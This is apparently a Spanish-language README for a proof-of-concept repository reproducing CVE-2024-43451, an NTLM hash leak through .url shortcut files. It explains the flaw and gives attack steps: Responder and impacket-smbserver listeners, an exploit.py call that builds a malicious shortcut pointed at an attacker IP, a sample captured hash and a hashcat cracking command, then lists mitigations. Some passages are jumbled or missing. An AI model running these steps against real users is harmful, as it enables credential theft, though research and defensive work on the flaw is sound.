
Reproducción de CVE: cve-2024-43451-ntlm_hash_disclosure_reproduction
CVE-2024-43451 es una vulnerabilidad de suplantación de identidad de divulgación de hash NTLMv2 en Windows. Permite que un atacante remoto no autenticado filtre el hash NTLM de la víctima convenciéndola de que interactúe con un archivo de acceso directo .url malicioso. La vulnerabilidad se activa con una interacción mínima del usuario — basta con hacer clic derecho, eliminar o mover el archivo para filtrar el hash. Tiene una puntuación CVSS de 6.5 (Media) y ha sido explotada activamente en entornos reales. CISA la añadió al catálogo de Vulnerabilidades Explotadas Conocidas (KEV).
NTLM (NT LAN Manager) es un protocolo de autenticación por desafío-respuesta utilizado por Windows. Cuando un cliente intenta acceder a un recurso a través de SMB, el cliente y el servidor realizan un handshake:
NEGOTIATE_MESSAGE con las capacidades admitidas.CHALLENGE_MESSAGE que contiene un nonce de 8 bytes (desafío del servidor).AUTHENTICATE_MESSAGE que contiene el hash NTLMv2 — un HMAC-MD5 del desafío combinado con el hash de la contraseña del usuario, el nombre de usuario y el dominio.Si un atacante puede observar o provocar un intento de autenticación NTLM hacia una máquina que controle, el AUTHENTICATE_MESSAGE capturado puede ser descifrado sin conexión para recuperar la contraseña en texto plano.
Un archivo .url es un archivo de acceso directo utilizado por Internet Explorer y el Explorador de Windows para almacenar enlaces. Es un archivo con formato INI que contiene una sección [InternetShortcut]. Los campos críticos para la explotación son:
URL= — la URL de destino que Windows abrirá.IconFile= — una ruta UNC opcional a un recurso de icono. Cuando el Explorador de Windows renderiza el archivo, intenta automáticamente recuperar el icono del recurso compartido remoto, lo que provoca un intento de autenticación NTLM contra el servidor del atacante.El atacante crea un archivo .url con un parámetro IconFile que apunta a \\attacker-ip\share\icon.ico. Cuando la víctima:
el Explorador de Windows intenta cargar el icono desde la ruta UNC, enviando el hash NTLMv2 de la víctima al listener SMB del atacante (por ejemplo, Responder).
Todas las versiones compatibles de Windows anteriores a la actualización del Patch Tuesday de noviembre de 2024:
| Herramienta | Descripción |
|---|---|
| Responder | Envenenador de LLMNR/NBT-NS/mDNS con servidor SMB integrado para la captura de hashes |
Con Responder:
sudo responder -I eth0 -v
O con Impacket:
sudo impacket-smbserver share . -smb2support
python exploit.py --ip 192.168.1.100 --output malicious.url
Cualquiera de las siguientes acciones provoca la filtración del hash:
El listener SMB del atacante recibe un hash NTLMv2:
[SMB] NTLMv2-SSP Hash : victim::DOMAIN:1122334455667788:0123456789abcdef0123456789abcdef:010100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
hashcat -m 5600 captured.txt /usr/share/wordlists/rockyou.txt
# See exploit.py in this repository for a full PoC implementation.
# The script generates a .url file with IconFile set to:
# \\192.168.1.100\share\icon.ico
# and optionally a custom display icon via IconIndex.
smbserver.py puede utilizarse para alojar un recurso compartido SMB simple |
| Inveigh | Herramienta de captura NTLM basada en PowerShell para Windows |
| Mitigación | Descripción |
|---|
| Aplicar el parche de noviembre de 2024 | Instalar la actualización de seguridad de Microsoft de KB5044285 |
| Bloquear SMB saliente (puerto 445) | Evitar que los hashes NTLM salgan del perímetro de la red |
| Deshabilitar NTLM cuando sea posible | Usar autenticación solo con Kerberos |
| Habilitar la firma SMB | Evita ataques de relay incluso si los hashes son capturados |
| Concienciación de usuarios | Educar a los usuarios para que no interactúen con archivos .url inesperados |
| Restringir el manejo de archivos .url | Usar Directivas de Grupo para bloquear la ejecución o entrega de archivos .url por correo electrónico |